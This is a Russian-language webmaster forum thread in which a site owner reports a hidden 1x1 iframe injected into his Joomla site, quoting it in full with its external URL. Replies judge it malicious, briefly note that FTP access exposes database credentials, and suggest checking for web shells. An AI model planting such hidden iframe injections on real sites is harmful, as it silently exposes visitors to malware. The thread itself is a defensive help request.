X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

Открыть тему
Тема закрыта
> Неизвестный код на сайте
dynz
dynz
Topic Starter сообщение 12.3.2012, 15:34; Ответить: dynz
Сообщение #1


Завсегдатай
*****

Группа: Active User
Сообщений: 588
Регистрация: 28.8.2010
Из: Мухосранск..
Поблагодарили: 157 раз
Репутация:   51  


Здравствуйте. Я дал заказ фрилансеру чтобы он исправил там некоторые баги в верстке и кое-что доверстал. Буквально сейчас на сайте обнаружил вот такой вот подозрительный код:
<iframe name="SagUTeXYne" src="http://freedom24.ru/templates/rhuk_milkyway/kx/index.php?out=1330961285" marginwidth="1" marginheight="0" title="DYvynEXUZe" border="0" width="1" frameborder="0" height="0" scrolling="no"></iframe>

Вопрос: что это за код? Вредоносный ли он? URL сайта: http://msosh.ru


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
allsab
allsab
сообщение 12.3.2012, 15:42; Ответить: allsab
Сообщение #2


Завсегдатай
*****

Группа: Active User
Сообщений: 764
Регистрация: 13.4.2009
Поблагодарили: 208 раз
Репутация:   53  


Очень похоже на вирус.

Да и на сайт http://freedom24.ru/templates/rhuk_milkywa...?out=1330961285 антивирус не пускает, тревога...
Думаю ничего хорошего от этого ожидать не стоит.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dynz
dynz
Topic Starter сообщение 12.3.2012, 15:54; Ответить: dynz
Сообщение #3


Завсегдатай
*****

Группа: Active User
Сообщений: 588
Регистрация: 28.8.2010
Из: Мухосранск..
Поблагодарили: 157 раз
Репутация:   51  


Уже удалил код, сменил FTP

Больше антивирусы не орут? Скажите можно имея доступ к FTP и доступ к админке joomla слить БД?

обнаружил на сайте mysqldumer. Удаляю. Он что БД слил получается?!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
allsab
allsab
сообщение 12.3.2012, 16:06; Ответить: allsab
Сообщение #4


Завсегдатай
*****

Группа: Active User
Сообщений: 764
Регистрация: 13.4.2009
Поблагодарили: 208 раз
Репутация:   53  


Сейчас нормально.
Можно с ftp узнать данные для доступа к базе данных через config, а дальше и слить уже.
По joomla точно не знаю, в dle в админ. панели есть функция резервного копирования базы данных.
Но зачем mysqldumer непонятно, если можно сразу же на компьютер закачать


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Electric
Electric
сообщение 12.3.2012, 17:04; Ответить: Electric
Сообщение #5


CMS help/antivirus
******

Группа: Active User
Сообщений: 1532
Регистрация: 27.12.2009
Из: Єдина Україна
Поблагодарили: 389 раз
Репутация:   57  


(dynz @ 12.3.2012, 14:54) *
Он что БД слил получается?!
Скорее всего. Но может не успел.
Имея доступ к ФТП - можно получить доступ к БД.
Проверьте на наличие других гадостей на сайте (именно по ФТП), вот тут рекомендации по удлению возможніх вирусов и шеллов: http://www.maultalk.com/topic116023.html


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Rxp
Rxp
сообщение 12.3.2012, 17:22; Ответить: Rxp
Сообщение #6


Участник
***


Группа: User
Сообщений: 115
Регистрация: 9.11.2008
Поблагодарили: 21 раз
Репутация:   10  


Возможно у вас шелл залит, если повториться данная проблема стучите помогу удалить и вирусы и шеллы!


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Kuznec37
Kuznec37
сообщение 12.3.2012, 17:32; Ответить: Kuznec37
Сообщение #7


Старожил
******

Группа: Active User
Сообщений: 1134
Регистрация: 24.4.2008
Из: Кафа
Поблагодарили: 279 раз
Репутация:   32  


(dynz @ 12.3.2012, 12:54) *
обнаружил на сайте mysqldumer. Удаляю. Он что БД слил получается?!

Дампером намного быстрее сделать резервное копирование, на все про все, как правило, достаточно пары минут. Так что скорее всего вы уже опоздали.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
GreenMan
GreenMan
сообщение 12.3.2012, 17:58; Ответить: GreenMan
Сообщение #8


Бывалый
****

Группа: User
Сообщений: 444
Регистрация: 28.6.2011
Из: Home
Поблагодарили: 80 раз
Репутация:   12  


Да, фрилансер молодец, конечно...


--------------------
- вэбмастер-энтузиаст -
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
dynz
dynz
Topic Starter сообщение 12.3.2012, 18:00; Ответить: dynz
Сообщение #9


Завсегдатай
*****

Группа: Active User
Сообщений: 588
Регистрация: 28.8.2010
Из: Мухосранск..
Поблагодарили: 157 раз
Репутация:   51  


Фуф) слава тебе господи. Это не фрилансер вроде. Сайт да слит, но вроде для того чтобы сделать то что он должен на локалхосте. Это уже я тупанул. Ну то что кто-то изменил файл index.php и добавил туда вредоносный код остается фактом. Постараюсь узнать по логам. Тогда будет более понятно smile.gif
Rxp хорошо обязательно постучу.

Замечание модератора:
Эта тема была закрыта автоматически ввиду отсутствия активности в ней на протяжении 100+ дней.
Если Вы считаете ее актуальной и хотите оставить сообщение, то воспользуйтесь кнопкой
или обратитесь к любому из модераторов.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Открытая тема (нет новых ответов) Узнай все, о своем и чужом сайте
Выгрузка: Ahrefs+Semrush+Majestic+Spywords
21 matrixzp 3253 2.10.2018, 22:28
автор: matrixzp
Открытая тема (нет новых ответов) Нужно поправить код в php файле
2 bljaher 650 1.10.2018, 18:23
автор: bljaher
Открытая тема (нет новых ответов) Как вывести значение доп. поле в код страницы?
1 sebadoh 605 26.9.2018, 21:21
автор: savik
Открытая тема (нет новых ответов) Ищу специалиста для анализа сайта (Метрика, Код)
1 by_roXe 637 16.9.2018, 15:46
автор: smmtut
Открытая тема (нет новых ответов) Плагин WordPress для повышение заработка на сайте AdsPlace'r Pro
7 mojwp 2073 20.8.2018, 13:10
автор: mojwp


 



RSS Текстовая версия Сейчас: 16.10.2018, 20:43
Дизайн